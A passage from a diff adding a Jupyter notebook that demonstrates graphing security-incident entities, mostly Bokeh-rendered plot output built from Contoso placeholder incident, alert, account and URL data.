class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[LinearAxis(id='3714', ...)],</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;'#e5e5e5',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GraphRenderer(id='3734', ...)],</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='3700', ...),</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='3725', ...),</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'right',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;800,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;Range1d(id='3702', ...),</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;LinearScale(id='3706', ...),</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;Range1d(id='3704', ...),</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;LinearScale(id='3708', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"4027\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"4026\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Figure(id='3699', ...)"
+      ]
+     },
+     "execution_count": 14,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "graph.remove_node(\"demo\")\n",
+    "graph.plot()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Adding & Removing Links Between Entities\n",
+    "\n",
+    "As well as adding entities to the graph you will also want to update the links between them as an investigation progresses. This can be done with the `add_link` and `remove_link` functions:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"4757\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"4757\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"4757\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"51c797e0-cdae-4cc2-b684-d8a7c6ea01d2\" data-root-id=\"4758\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"1fada6d0-fa85-4099-a502-97df53ca47e7\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"4769\"}],\"center\":[{\"id\":\"4772\"},{\"id\":\"4776\"},{\"id\":\"4808\"},{\"id\":\"4809\"},{\"id\":\"4810\"},{\"id\":\"4811\"}],\"height\":800,\"left\":[{\"id\":\"4773\"}],\"renderers\":[{\"id\":\"4793\"}],\"title\":{\"id\":\"4759\"},\"toolbar\":{\"id\":\"4784\"},\"width\":800,\"x_range\":{\"id\":\"4761\"},\"x_scale\":{\"id\":\"4765\"},\"y_range\":{\"id\":\"4763\"},\"y_scale\":{\"id\":\"4767\"}},\"id\":\"4758\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"field\":\"node_color\"},\"size\":{\"value\":25}},\"id\":\"4803\",\"type\":\"Circle\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"node_type\",\"@node_type\"],[\"name\",\"@name\"],[\"description\",\"@description\"],[\"entitytype\",\"@entitytype\"]]},\"id\":\"4791\",\"type\":\"HoverTool\"},{\"attributes\":{},\"id\":\"4767\",\"type\":\"LinearScale\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"4763\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"4765\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"5025\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"4782\",\"type\":\"HelpTool\"},{\"attributes\":{\"text\":\"www.contoso.com\",\"text_font_size\":\"10pt\",\"x\":-0.7051178209330256,\"x_offset\":5,\"y\":-0.2389647836180562,\"y_offset\":5},\"id\":\"4811\",\"type\":\"Label\"},{\"attributes\":{\"formatter\":{\"id\":\"5022\"},\"major_label_policy\":{\"id\":\"5021\"},\"ticker\":{\"id\":\"4770\"}},\"id\":\"4769\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"5026\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"4774\",\"type\":\"BasicTicker\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"4761\",\"type\":\"Range1d\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"4777\"},{\"id\":\"4778\"},{\"id\":\"4779\"},{\"id\":\"4780\"},{\"id\":\"4781\"},{\"id\":\"4782\"},{\"id\":\"4791\"}]},\"id\":\"4784\",\"type\":\"Toolbar\"},{\"attributes\":{\"graph_layout\":{\"Alert: User Added to Priviledged Group in CONTOSO Domain\":[1.9977699864667051,0.6770116506606975],\"CONTOSO\\\\auser\":[-2.0,-0.6777277366197544],\"Incident: Sample Incident\":[0.7073478344663202,0.2396808695771133],\"www.contoso.com\":[-0.7051178209330256,-0.2389647836180562]}},\"id\":\"4802\",\"type\":\"StaticLayoutProvider\"},{\"attributes\":{},\"id\":\"4778\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"4777\",\"type\":\"PanTool\"},{\"attributes\":{\"data_source\":{\"id\":\"4795\"},\"glyph\":{\"id\":\"4803\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"4797\"}},\"id\":\"4796\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"overlay\":{\"id\":\"4783\"}},\"id\":\"4779\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"source\":{\"id\":\"4795\"}},\"id\":\"4797\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"4780\",\"type\":\"SaveTool\"},{\"attributes\":{\"data\":{\"color\":[\"red\",\"orange\",\"green\",\"green\"],\"description\":[\"2021-09-22T15:09:09.2786667Z - Sample Incident - 123\",\"User Added to Priviledged Group in CONTOSO Domain - ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5']\",null,\"www.contoso.com\"],\"end_time\":[\"2021-09-22T14:39:24.04Z\",null,null,null],\"entitytype\":[\"incident\",\"alert\",\"account\",\"url\"],\"index\":[\"Incident: Sample Incident\",\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"CONTOSO\\\\auser\",\"www.contoso.com\"],\"name\":[\"Sample Incident\",\"User Added to Priviledged Group in CONTOSO Domain\",\"CONTOSO\\\\auser\",\"www.contoso.com\"],\"node_color\":[\"red\",\"orange\",\"green\",\"green\"],\"node_type\":[\"incident\",\"alert\",\"entity\",\"entity\"],\"source\":[null,\"{ 'AdditionalData': { 'ID': '8b7d06d8-dbae-4b23-87ed-1a27b75437d5',\\n                      'Name': 'User Added to Priviledged Group in CONTOSO Domain'},\\n  'DisplayName': 'User Added to Priviledged Group in CONTOSO Domain',\\n  'SystemAlertIds': ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5'],\\n  'Type': 'alerts',\\n  'edges': set()}\",\"{ 'AdditionalData': {},\\n  'DisplayName': 'CONTOSO\\\\\\\\auser',\\n  'IsDomainJoined': False,\\n  'Type': 'account',\\n  'edges': set()}\",\"{'AdditionalData': {}, 'Type': 'url', 'Url': 'www.contoso.com', 'edges': set()}\"],\"start_time\":[\"2021-09-22T14:39:24.04Z\",null,null,null],\"time_generated\":[\"2021-09-22T15:09:09.2786667Z\",null,null,null]},\"selected\":{\"id\":\"5025\"},\"selection_policy\":{\"id\":\"5026\"}},\"id\":\"4795\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"4781\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"4798\",\"type\":\"MultiLine\"},{\"attributes\":{\"data\":{\"end\":[\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"www.contoso.com\",\"www.contoso.com\"],\"start\":[\"Incident: Sample Incident\",\"Incident: Sample Incident\",\"CONTOSO\\\\auser\"]},\"selected\":{\"id\":\"5027\"},\"selection_policy\":{\"id\":\"5028\"}},\"id\":\"4799\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"5027\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"4799\"},\"glyph\":{\"id\":\"4798\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"4801\"}},\"id\":\"4800\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"5028\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"5015\",\"type\":\"NodesOnly\"},{\"attributes\":{\"source\":{\"id\":\"4799\"}},\"id\":\"4801\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"text_font_size\":\"10pt\",\"x\":1.9977699864667051,\"x_offset\":5,\"y\":0.6770116506606975,\"y_offset\":5},\"id\":\"4809\",\"type\":\"Label\"},{\"attributes\":{\"axis\":{\"id\":\"4769\"},\"ticker\":null},\"id\":\"4772\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"5021\",\"type\":\"AllLabels\"},{\"attributes\":{\"edge_renderer\":{\"id\":\"4800\"},\"inspection_policy\":{\"id\":\"5015\"},\"layout_provider\":{\"id\":\"4802\"},\"node_renderer\":{\"id\":\"4796\"},\"selection_policy\":{\"id\":\"5016\"}},\"id\":\"4793\",\"type\":\"GraphRenderer\"},{\"attributes\":{\"text\":\"CONTOSO\\\\auser\",\"text_font_size\":\"10pt\",\"x\":-2.0,\"x_offset\":5,\"y\":-0.6777277366197544,\"y_offset\":5},\"id\":\"4810\",\"type\":\"Label\"},{\"attributes\":{\"formatter\":{\"id\":\"5009\"},\"major_label_policy\":{\"id\":\"5008\"},\"ticker\":{\"id\":\"4774\"}},\"id\":\"4773\",\"type\":\"LinearAxis\"},{\"attributes\":{\"axis\":{\"id\":\"4773\"},\"dimension\":1,\"ticker\":null},\"id\":\"4776\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"5016\",\"type\":\"NodesOnly\"},{\"attributes\":{\"text\":\"Incident: Sample Incident\",\"text_font_size\":\"10pt\",\"x\":0.7073478344663202,\"x_offset\":5,\"y\":0.2396808695771133,\"y_offset\":5},\"id\":\"4808\",\"type\":\"Label\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"4783\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"4770\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"5022\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"5008\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"5009\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"text\":\"Alert Entity graph\"},\"id\":\"4759\",\"type\":\"Title\"}],\"root_ids\":[\"4758\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.3\"}};\n  var render_items = [{\"docid\":\"1fada6d0-fa85-4099-a502-97df53ca47e7\",\"root_ids\":[\"4758\"],\"roots\":{\"4758\":\"51c797e0-cdae-4cc2-b684-d8a7c6ea01d2\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "4758"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'4758', <span id=\"5152\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div 